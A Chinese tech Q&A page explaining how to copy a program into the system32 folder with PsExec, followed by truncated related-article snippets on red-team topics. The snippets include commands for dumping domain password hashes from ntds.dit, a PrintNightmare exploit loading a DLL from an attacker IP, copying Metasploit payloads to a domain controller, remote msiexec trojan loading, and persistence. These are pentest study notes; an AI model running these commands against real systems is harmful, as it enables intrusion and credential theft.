PsExec：将我的程序复制到“system32”文件夹中

您好！您提到的PsExec是一个Windows系统管理工具，它允许您在本地或远程计算机上执行命令和脚本。将程序复制到“system32”文件夹中可以使其在计算机上运行。

PsExec是由Sysinternals公司开发的，它可以让您在本地或远程计算机上执行命令和脚本。它可以让您远程管理计算机，并且可以在计算机上执行各种任务，例如启动和停止服务、安装和卸载软件等。

将程序复制到“system32”文件夹中可以使其在计算机上运行，但是这需要管理员权限。如果您没有管理员权限，则需要联系管理员来完成此操作。

您可以使用PsExec将程序复制到“system32”文件夹中，例如：

psexec \\computername -u username -p password copy c:\myfolder\myprogram.exe c:\windows\system32

这将将myprogram.exe复制到计算机的“system32”文件夹中。

需要注意的是，PsExec需要管理员权限才能运行，因此您需要确保您有足够的权限才能使用它。此外，PsExec可能会受到防火墙和安全策略的限制，因此您需要确保您的计算机和网络允许使用PsExec。

相关·内容

找出文件夹(及其子文件夹)中的文件并复制到目标文件夹中

程序源码 2.2....测试结果文本提示找出文件夹(及其子文件夹)中的文件并复制到目标文件夹中 1.问题引出下载了整个2018年和2019年上半年的经济学人，不过是根据发刊日期建立了多个文件夹，我想复制出里面所有的*.epub...而且为了便于按照名字排序，最后复制后的名字做了处理，只保留了文件名中的数字（经济学人发布的年份，因为不是一个人发布的名字多少不统一。...程序源码 # UTF-8 # 整理文件 # 将指定目录下的对应格式的文件（eg.epub）复制到指定的目录中 # ------------------------------------ import...path: "文件夹"和"文件"所在的路径 :return: (list_folders, list_files) :list_folders: 文件夹

3K2 0

psexec提权删除残留的显卡驱动文件

Windows\System32目录下然后以Administrator身份在cmd命令行执行psexec.exe -accepteula -nobanner -i -s powershellpsexec.exe...-nobanner -i -s cmdpsexec后面的参数-accepteula -nobanner 是接受协议、隐藏回显头部信息的，可有可无，主要是后面的-is简单记的话就是psexec -is...cmd或psexec -is powershell，执行后会打开一个有system权限（比Administrator权限大）的窗口，在这个窗口里执行你想执行的命令，比如删除某个有权限保护但没啥用的文件夹...，例如卸载显卡驱动，已经从appwiz.cpl程序列表卸载了，但C:\Windows\System32\DriverStore\FileRepository\目录还残留有计算型驱动nv_disp打头和渲染型驱动...nvgrid打头的2个文件夹，正常删除是删不了的，得提权后执行删除命令（cmd执行）rd /s /q C:\Windows\System32\DriverStore\FileRepository\nv_dispswi.inf_amd64

1.3K1 0

通过Webshell远程导出域控ntds.dit的方法

这个任务可以通过使用“psexec”来完成，我们只需在“copy”命令中指定目标AD域控机器的IP，域管理员用户名和密码即可，请使用SMB将ndts.dit和SYSTEM文件从卷影副本复制到LABONE...这里，我将这些文件复制到了我转储psexec文件的同一目录下。...可以看到out.txt文件已生成在了目录中，让我们来查看下其中的内容。 ? “out.txt”文件内容显示，目标域控机器到目前为止并没有任何的卷影副本。...用于创建c盘卷影副本的命令如下： vssadmin create shadow /for=C: 我们需要有新创建的“C”盘卷影副本的名称它将在命令的输出中，因此我们将把上述命令的输出重定向到我们拥有web...\box\ps\out.txt”文件中。

1.4K1 0

如何让软件以 System 权限运行

使用 PsExec 可以让软件以 System 账户运行我最近开发的 WPF 小工具需要在用户端被一个 System 权限的服务运行，我想调试这个 System 权限运行的程序，此时快速的方法是通过...PsExec 运行程序，同时在程序里面输出文件日志从官网 https://docs.microsoft.com/en-us/sysinternals/downloads/psexec 下载最新版的 PsExec...工具，通过管理员权限运行假设需要运行的程序是 foo.exe 那么通过下面命令行可以让 foo.exe 以 System 权限运行 psexec -s foo.exe 那么用 system 帐号运行的程序使用下面代码返回的值有什么不同...System.Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) 使用 SYSTEM 账户将映射 C:\windows\system32...\config\systemprofile\appdata 文件夹 本作品采用知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议进行许可。

2.5K2 0

CVE-2021-1675 Windows Print Spooler RCE EXP

attackerip\Evil.dll pDriverPath=C.dll 它将 A、B 和 C 复制到文件夹 C:\Windows\System32\spool\drivers\x64\3\new。...这将使我们的 evildll Evil.dll 被复制到 C:\Windows\System32\spool\drivers\x64\3\ Evil.dll。...它将加载我们的邪恶 dll。不幸的是，它不起作用。因为如果你在文件夹C:\Windows\System32\spool\drivers\x64\3中设置了A、B、C。文件复制会出现访问冲突。...为了绕过这个，我们需要使用驱动程序升级的备份功能。如果我们升级某些驱动程序，旧版本将备份到 C:\Windows\System32\spool\drivers\x64\3\old\1\ 文件夹中。...然后我们可以绕过访问冲突并成功将我们的 evil.dll 注入到 spooler 服务中。成功加载我们的dll：用法 .

1.1K2 0

导出域内用户hash的几种方法

这些文件将被解压缩到当前工作目录或指定的任何其他文件夹中。 Import-Module ....将生成两个新文件夹：Active Directory和Registry。NTDS.DIT文件将保存在Active Directory中，SAM和SYSTEM文件将保存到Registry文件夹中。 ?...从Windows命令提示符执行以下操作将创建C：驱动器的快照，以便用户通常将无法访问的文件将其复制到另一个位置（本地文件夹，网络文件夹或可移动介质）。...由于C：驱动器中的所有文件都已复制到另一个位置（HarddiskVolumeShadowCopy1），因此它们不会被操作系统直接使用，因此可以访问并复制到另一个位置。...命令副本并将NTDS.DIT和SYSTEM文件复制到名为ShadowCopy的本地驱动器上的新创建文件夹中。 copy \\?

4.5K4 0

Petya 勒索软件新变种详细分析报告

Petya勒索病毒变种中毒后会扫描内网的机器，通过永恒之蓝漏洞自传播到内网的机器，也通过渗透攻击获取内网域管理员账号密码信息，wmic或者psexec远程命令执行，达到快速传播的目的。...2）获取本地密码 Dll文件中自带融合了mimikatz功能的资源，在运行过程中，会释放出解密后的资源，对比mimikatz与解密后的资源文件如下： [1498792327361_6468_1498792327537...3）将自身复制到内网其他机器的admin$共享目录。...其实就是psexec，用于远程执行命令。...、并加密MFT； 3、显示红色的勒索界面，让用户输入秘钥；细节分析： MBR启动后，将1-21扇区数据复制到8000地址处，然后Jmp执行8000地址代码 [1498792677945_6772

1.2K0 0

域渗透学习

一、Kerbers协议NTLM认证 Kerberos是一种由MIT提出的一种计算机网络授权协议，旨在通过使用加密技术为客户端/服务端应用程序提供强大的认证服务。...GPP中域控给域成员添加的账号信息以xml形式保存在域内主机，可以直接读取xml文件拿到账号密码。所以在拿下域内主机之后一定要打开访问域策略共享文件夹，可以看到拿到的域主机被下发了哪些策略。...同时，存放在Sysvol文件夹中的信息会复制到域中所有DC上域服务器一般都会共享这个文件夹,或者搜索当前机器下的XML文件将包含凭据：映射驱动（Drives.xml）数据源（DataSources.xml...\c$ # 调用cmd psexec.exe \\域控IP cmd.exe ---- 中继hash攻击在hash无法解密的情况下也可以通过中继NTLMv2哈希的方法来获取网络中机器的shell访问权限...将证书文件复制到mimikaz同级目录下。

1.4K3 1

VBA实用小程序72：遍历文件夹（和子文件夹）中的文件

很多时候，我们都想要遍历文件夹中的每个文件，例如在工作表中列出所有文件名、对每个文件进行修改。VBA给我们提供了一些方式：（1）Dir函数；（2）File System Object。...使用Dir函数 Dir函数是一个内置的VBA函数，可用于可使用VBA的任何应用程序。...图1 后期绑定后期绑定不需要任何特定操作来启用FSO库，确保在VBA代码中需要时打开库。遍历文件夹中所有文件下面的示例代码将文件名打印到立即窗口，很容易修改这些代码以更适合你的具体情况。...当文件存储在子文件夹中时，可能就需要一些技巧了。...现在需要找到一种方法来钻取到这些子文件夹中。我们将使用上述相同的Dir和FSO方法。为了确保这些代码可以处理任意数量的子文件夹，宏实际上会调用自身（一种称为递归的技术）。

9.5K3 0

抓取域密码哈希的各种工具集合

这些密码哈希存储在域控制器（NTDS.DIT）中的数据库文件中，并包含一些附加信息，如组成员和用户。 NTDS.DIT 文件经常被操作系统使用，因此不能直接复制到另一个位置提取信息。...NTDS.DIT 文件将保存在 Active Directory 中，SAM 和 SYSTEM 文件将保存到注册表文件夹中 ?...C 盘的所有文件都已经复制到 HarddiskVolumeShadowCopy1 上，操作系统不直接使用，所以可以访问和复制其上的任何文件。...将 NTDS.DIT 和 SYSTEM 文件复制到本地名为 ShadowCopy 的新文件夹： copy \?...Metasploit Metasploit 框架中可以使用下面的模块，提取 ntds 中的相关信息： auxiliary/admin/smb/psexec_ntdsgrab ?

2K5 0

必须放在特定的文件夹中才能运行的Python程序

下面的小代码要演示的问题是，可以规定某个Python程序必须放在特定的文件夹（代码中假设必须放到Python安装目录中）中才能运行，移动到其他文件夹之后会拒绝运行。...import os import sys #获取当前文件夹或程序所在文件夹 cur = os.getcwd() #Python安装文件夹 right = sys.prefix if right !

1.8K6 0

内网渗透测试：内网横向移动基础总结

如，我们列出DC上C盘的目录： dir \\192.168.183.130\c$ 再如将文件复制到目标主机DC的C盘上面去：（在实战中，我们可以将木马程序复制到目标主机上去） copy C:\Users...然后使用copy命令远程操作，将metasploit生成的payload文件复制到目标系统C盘中： copy shell.exe \\192.168.183.130\c$ 4....然后使用copy命令远程操作，将metasploit生成的payload文件shell.exe复制到目标系统C盘中。 3. 在目标主机DC上创建一个名称为“backdoor”的计划任务。...通过DCOM，客户端程序对象能够向网络中的另一台计算机上的服务器程序对象发送请求。下面通过一个实验来讲解如何使用DCOM在远程主机上面执行命令。...然后在Windows7跳板机上传metasploit木马程序shell.exe，并使用copy命令将shell.exe复制到DC的c盘上面去。 3.

3K1 0

Windows权限提升之AppLocker绕过

设置的默认规则仅允许从 C:\Windows\* 或 C:\Program Files\* 中执行可执行文件和脚本。这意味着我们只能从这些文件夹或其中的任何子文件夹（从通配符）执行脚本。...现在，我们需要做的就是将我们尝试运行的可执行文件复制到我们已确认用户可以写入的标准的文件夹之一中。...需要注意的是，当从 ADS 执行文件时，它会打开一个新窗口来运行程序。如果我们在反向 shell 中工作，这将是一个问题，因为我们将看不到 PEAS 的输出。...由于 C:\Program Files 中没有任何可供标准用户写入的默认文件夹/文件，因此我们需要关注非默认文件夹。...如果我们可以在这里编写，那么我们可以将可执行文件复制到该目录中并执行它们。

2985 0

解决win10下git闪退

问题描述在git官网下载了软件，安装之后，git Bash出现闪退现象，同时在当前文件夹下面会生成一个mintty.exe.stackdump的文件。...如下图所示，根据路径C:\Windows\System32\drivers，来到这个目录下，找到null.sys文件。这是一个系统配置文件，我们要把它替换成我们刚刚下载的那个文件。...为了以防万一，我们可以先将原本的这个文件复制到桌面做个备份。 ?...将上图目录下的null.sys文件删除，将我们下载的文件复制到这个目录下，如果系统提示我们没有权限，可以采用360杀毒软件强制删除。...4.文件替换完成之后，我们来到C:\Windows\System32目录下，找到cmd.exe文件，右键点击文件，选择【以管理员身份运行】。 ?

1.3K2 0

计划任务的攻防战 | Window 应急响应

-s regedit 这里可以看到 Id、Index、SD ，按照文章描述，修改 Index 和 SD 都可以完成隐藏尝试将 Index 的值设置为 0 计划任务程序中刷新发现计划任务 test1...SD 复制给它，这样就能在计划任务程序中显示了，可以直接删除 0x03 将上面两种结合起来什么效果直接给出结论吧计划任务程序看不到计划任务日志管理器可以看到两种方法的排查脚本可以看到删除时补...-s regedit 尝试删除 SD中的一部分，例如删除结尾的一个 00 刷新计划任务程序没有什么影响，看来删除的不够多，尝试删除一半刷新计划任务程序果然又消失了 3....不着急直接变成变态，我们先尝试将文件夹中的计划任务test5删除掉不耽误计划任务执行开始变态，删除掉 testdir 不耽误计划任务执行 12....，不耽误不保留计划任务注册表项删除注册表中的计划任务删除注册表中的计划任务文件夹 直接将计划任务注册表搞坏其实这几种都是一样的，因为计划任务服务会“缓存”计划任务配置，所以修改注册表后，只有在计划任务服务重启后

2381 0

隔空执行的学习总结

PE文件（exe程序） PE头，代码段，函数，资源，结尾进行文件合并： copy 1.png /b + 2.rar /b 3.png 合并1.png和2.rar为3.png 通过合并rar和txt的文件...通过txt来执行木马程序把haha.txt放到某个web目录里 msi=静默安装包这里我们假设已经入侵成功需要运行某个软件默认位置： c:/windows/system32/msiexec.exe...syswow64/msiexec.exe 远程加载木马到电脑上运行 msiexec /q /i http://192.168.119.135/go.txt 成功实现隔空执行这里我们通过将txt文件存入网站中然后在对方电脑中通过...准备工作： 1.目标主机的防火墙最好关闭 2.创建/获得对方计算机的用户名密码直接控制对方cmd psexec \\目标ip -u [目标用户名] -p [密码] cmd.exe 控制对方电脑运行自己的...c盘的xk.exe psexec \\目标ip -u [目标用户名] -p [密码] -c c:\xk.exe 远程运行对方电脑的notepad.exe psexec \\目标ip -u [目标用户名]

1542 0

红队笔记 - 提权&权限维持

在枚举结果中查找的内容：默认凭据，尝试将它们转给其他用户。开放端口，有没有只监听 127.0.0.1 的服务？寻找漏洞。运行软件中寻找漏洞。...\PsExec.exe -i -s "c:\temp\rev.bat" 如果你在 Windows 系统上有一个 shell 并且有另一个用户的密码，PsExec 也可以用来作为目标用户执行程序...为了在 Linux 中有效提权，您必须回答的一些问题与 Windows 类似，有些则完全不同。一般来说，以下是一些经常相关的问题。是否有任何正在运行的服务或程序看起来是非默认的？他们脆弱吗？...权限维持启动文件夹 只要放下一个二进制文件在当前用户文件夹中，将在当前用户登录时触发。...c:\Users\[USERNAME]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 或者在全局启动文件夹中，需要管理权限，

1.2K4 0

OFFENSIVE LATERAL MOVEMENT 横向移动(译文)

令牌中的信息包括与进程或线程关联的用户帐户的标识和特权。当用户登录时，系统通过将用户密码与安全数据库中存储的信息进行比较来验证用户密码。验证用户的凭证后，系统将生成访问令牌。...Red Canary撰写了一篇有关检测它的出色文章。Cobalt Strike有两个内置的PsExec，一个称为PsExec，另一个称为PsExec（psh）。...\host.domainC$WindowsTempbuild.xml" 在Cobalt Strike中，有一个Aggressor Script扩展程序，该扩展程序使用MSBuild执行Powershell...DCOM 组件对象模型（COM）是具有不同应用程序和语言的进程使用的一种协议，因此它们彼此通信。 COM对象不能在引入了分布式COM（DCOM）协议的网络上使用。....hta文件是Microsoft HTML应用程序文件，允许在HTML应用程序中执行Visual Basic脚本。

4K1 0

域渗透-横向移动命令总结

；/TN,指定要创建的计划任务的名称；/SC,指定计划任务执行频率 #/M0,指定计划任务执行周期；/TR,指定计划任务运行的程序路径；/RU,指定计划任务运行的用户权限 #/F,如果指定的任务已经存在...PsExec原理是通过SMB连接到服务端的Admin$共享，并释放名为“psexesvc..exe”的二进制文件，然后注册名为“PSEXESVC”服务。...当客户端执行命令时，服务端通过PSEXESVC服务启动相应的程序执行命令并回显数据。运行结束后，PSEXESVC服务会被删除。...目前有两种常见的利用方法：一是通过调用WMI的类方法进行远程执行，如Win32 Process类中的Create方法可以在远程主机上创建进程，Win32 Product类中的Install方法可以在远程主机上安装恶意的...，并每隔60秒执行一次SMB共享中的攻击载荷，使远程主机上线。

2.1K1 0

进攻性横向移动

执行程序 PsExec来自微软的 Sysinternals套件，允许用户使用命名管道通过端口 445 (SMB) 在远程主机上执行 PowerShell。...Cobalt Strike 有两个 PsExec 内置程序，一个称为 PsExec，另一个称为 PsExec (psh)。...两者之间的区别，尽管 CS 文档说，PsExec (psh) 正在调用 Powershell.exe，并且您的信标将作为 Powershell.exe 进程运行，而没有 (psh) 的 PsExec 将作为...hta 文件是 Microsoft HTML 应用程序文件，允许在 HTML 应用程序中执行 Visual Basic 脚本。...Mshta 的好处是允许通过 URL 执行，并且由于它是受信任的 Microsoft 可执行文件，因此应该绕过默认的应用程序白名单。

2.1K1 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云